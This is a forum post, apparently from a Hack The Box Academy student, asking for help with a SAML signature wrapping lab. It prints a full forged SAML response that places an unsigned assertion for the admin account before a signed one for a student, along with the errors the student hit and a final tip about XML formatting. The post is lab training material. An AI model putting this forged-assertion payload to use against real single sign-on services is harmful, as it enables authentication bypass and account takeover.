Signature Wrapping Attack

Hey super HTB team and students, I’m really struggling with one challenge/section: “Signature Wrapping Attack.

I’ve spent literally 5 days trying to get the admin authentication for the SAML, but I just can’t make it and I don’t understand exactly why. I even read some academic research papers about this, such as:

https://arxiv.org/pdf/1401.7483
https://arxiv.org/pdf/2106.10460

And also the great Hacktricks article… thanks to that I was trying with the burp extension SAML Raider too without success…

Any tricks or tips? I’ve tried many things manually and with various tools, including the one mentioned above. I’ve tried positioning the evil assertion below, above, and in the same node as the real one, as well as outside the node. I’ve also tried copying and pasting the section code as is and making minor changes, but nothing seems to work.

Drowning GIFs - Find & Share on GIPHY

Manually I tried different ways but this should be the main code:

<samlp:Response
	xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
	xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_d958ac4530fdddf976d657214527488607b3aa59f4" Version="2.0" IssueInstant="2024-05-21T09:03:07Z" Destination="http://academy.htb/acs.php" InResponseTo="ONELOGIN_efa0901a71f2d630a4e3a8fe0f9d0516a3395427">
	<saml:Issuer>http://sso.htb/simplesaml/saml2/idp/metadata.php</saml:Issuer>
	<samlp:Status>
		<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
	</samlp:Status>
		<saml:Assertion
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_evilID" Version="2.0" IssueInstant="2024-05-21T09:03:07Z">
		<saml:Issuer>http://sso.htb/simplesaml/saml2/idp/metadata.php</saml:Issuer>
		<saml:Subject>
			<saml:NameID SPNameQualifier="http://academy.htb/" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_a94cd98671a088eecdbdddd6a0aed687cc8ff39467</saml:NameID>
			<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
				<saml:SubjectConfirmationData NotOnOrAfter="2024-05-21T09:08:07Z" Recipient="http://academy.htb/acs.php" InResponseTo="ONELOGIN_efa0901a71f2d630a4e3a8fe0f9d0516a3395427"/>
			</saml:SubjectConfirmation>
		</saml:Subject>
		<saml:Conditions NotBefore="2024-05-21T09:02:37Z" NotOnOrAfter="2024-05-21T09:08:07Z">
			<saml:AudienceRestriction>
				<saml:Audience>http://academy.htb/</saml:Audience>
			</saml:AudienceRestriction>
		</saml:Conditions>
		<saml:AuthnStatement AuthnInstant="2024-05-21T08:45:45Z" SessionNotOnOrAfter="2024-05-21T16:45:45Z" SessionIndex="_34c06cc1124bf2352b486ff09d7c4389fbc16c778f">
			<saml:AuthnContext>
				<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
			</saml:AuthnContext>
		</saml:AuthnStatement>
		<saml:AttributeStatement>
			<saml:Attribute Name="id" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
				<saml:AttributeValue xsi:type="xs:string">1</saml:AttributeValue>
			</saml:Attribute>
			<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
				<saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>
			</saml:Attribute>
			<saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
				<saml:AttributeValue xsi:type="xs:string">admin@academy.htb</saml:AttributeValue>
			</saml:Attribute>
		</saml:AttributeStatement>
	</saml:Assertion>
	<saml:Assertion
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_0c592e159137c0761c00b520ad5bb0ac2749166593" Version="2.0" IssueInstant="2024-05-21T09:03:07Z">
		<saml:Issuer>http://sso.htb/simplesaml/saml2/idp/metadata.php</saml:Issuer>
		<ds:Signature
			xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
			<ds:SignedInfo>
				<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
				<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
				<ds:Reference URI="#_0c592e159137c0761c00b520ad5bb0ac2749166593">
					<ds:Transforms>
						<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
						<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
					</ds:Transforms>
					<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
					<ds:DigestValue>JpZMdnjXGKIKScnccm7Pc2H65cvxOgD5Zz8NEFS4Ars=</ds:DigestValue>
				</ds:Reference>
			</ds:SignedInfo>
			<ds:SignatureValue>IEzaZwANZxQSv/VjqDbTvLJ8M+sRXSQ8CxGG2GbIXFU68mQRbYTBU7Fs7SEtEEwcPTKKvY7B8/gwB3GcewRNAm/TFfL4g0q4Y7EZryrCIHPwHnLYPT0/fudwB3YSClUZGeANMChov5ie1L62bp88AVa2KwlxK6QuV5lrdt34jEAMvpWHJ0+0nYHFCKFaGf3O2QnCjpoFzYxezLCZWs+iR+4CdmWRgztIP7LcGOi70UcyKEj4qn2a6BCk4gV1M5Sh/X3Eia6xpHAgxLzD6LCud/tn8etexCUWobYfhMUeW5ilk9hDBemcFsPnVQgy1rr9aaeTtnCVI0K9iboBNyoPjw==</ds:SignatureValue>
			<ds:KeyInfo>
				<ds:X509Data>
					<ds:X509Certificate>MIICmjCCAYICCQDX5sKPsYV3+jANBgkqhkiG9w0BAQsFADAPMQ0wCwYDVQQDDAR0ZXN0MB4XDTE5MTIyMzA5MDI1MVoXDTIwMDEyMjA5MDI1MVowDzENMAsGA1UEAwwEdGVzdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMdtDJ278DQTp84O5Nq5F8s5YOR34GFOGI2Swb/3pU7X7918lVljiKv7WVM65S59nJSyXV+fa15qoXLfsdRnq3yw0hTSTs2YDX+jl98kK3ksk3rROfYh1LIgByj4/4NeNpExgeB6rQk5Ay7YS+ARmMzEjXa0favHxu5BOdB2y6WvRQyjPS2lirT/PKWBZc04QZepsZ56+W7bd557tdedcYdY/nKI1qmSQClG2qgslzgqFOv1KCOw43a3mcK/TiiD8IXyLMJNC6OFW3xTL/BG6SOZ3dQ9rjQOBga+6GIaQsDjC4Xp7Kx+FkSvgaw0sJV8gt1mlZy+27Sza6d+hHD2pWECAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAm2fk1+gd08FQxK7TL04O8EK1f0bzaGGUxWzlh98a3Dm8+OPhVQRi/KLsFHliLC86lsZQKunYdDB+qd0KUk2oqDG6tstG/htmRYD/S/jNmt8gyPAVi11dHUqW3IvQgJLwxZtoAv6PNs188hvT1WK3VWJ4YgFKYi5XQYnR5sv69Vsr91lYAxyrIlMKahjSW1jTD3ByRfAQghsSLk6fV0OyJHyhuF1TxOVBVf8XOdaqfmvD90JGIPGtfMLPUX4m35qaGAU48PwCL7L3cRHYs9wZWc0ifXZcBENLtHYCLi5txR8c5lyHB9d3AQHzKHMFNjLswn5HsckKg83RH7+eVqHqGw==</ds:X509Certificate>
				</ds:X509Data>
			</ds:KeyInfo>
		</ds:Signature>
		<saml:Subject>
			<saml:NameID SPNameQualifier="http://academy.htb/" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_a94cd98671a088eecdbdddd6a0aed687cc8ff39467</saml:NameID>
			<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
				<saml:SubjectConfirmationData NotOnOrAfter="2024-05-21T09:08:07Z" Recipient="http://academy.htb/acs.php" InResponseTo="ONELOGIN_efa0901a71f2d630a4e3a8fe0f9d0516a3395427"/>
			</saml:SubjectConfirmation>
		</saml:Subject>
		<saml:Conditions NotBefore="2024-05-21T09:02:37Z" NotOnOrAfter="2024-05-21T09:08:07Z">
			<saml:AudienceRestriction>
				<saml:Audience>http://academy.htb/</saml:Audience>
			</saml:AudienceRestriction>
		</saml:Conditions>
		<saml:AuthnStatement AuthnInstant="2024-05-21T08:45:45Z" SessionNotOnOrAfter="2024-05-21T16:45:45Z" SessionIndex="_34c06cc1124bf2352b486ff09d7c4389fbc16c778f">
			<saml:AuthnContext>
				<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
			</saml:AuthnContext>
		</saml:AuthnStatement>
		<saml:AttributeStatement>
			<saml:Attribute Name="id" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
				<saml:AttributeValue xsi:type="xs:string">1234</saml:AttributeValue>
			</saml:Attribute>
			<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
				<saml:AttributeValue xsi:type="xs:string">htb-stdnt</saml:AttributeValue>
			</saml:Attribute>
			<saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
				<saml:AttributeValue xsi:type="xs:string">student@academy.htb</saml:AttributeValue>
			</saml:Attribute>
		</saml:AttributeStatement>
	</saml:Assertion>
</samlp:Response>

following the XSW #3 BUT I also tried the other ones…


i’m receiving these kind of errors:

  • Invalid SAML Response. Not Authenticated.
  • Warning: DOMDocument::loadXML(): Start tag expected, ‘<’ not found in Entity, line: 1 in /var/www/sp/vendor/onelogin/php-saml/src/Saml2/Utils.php on line 87
  • Something went wrong.
  • and others related with a broken XML file or a missing “>” character too

Thank yoooouuuu guys!

In case you are having the same issue… just don’t use XML beautifier and/or change the structure to make it look better.

is a pain in the ■■■ but edit the SAML request as it is
Finally!!! :tada::clap::partying_face: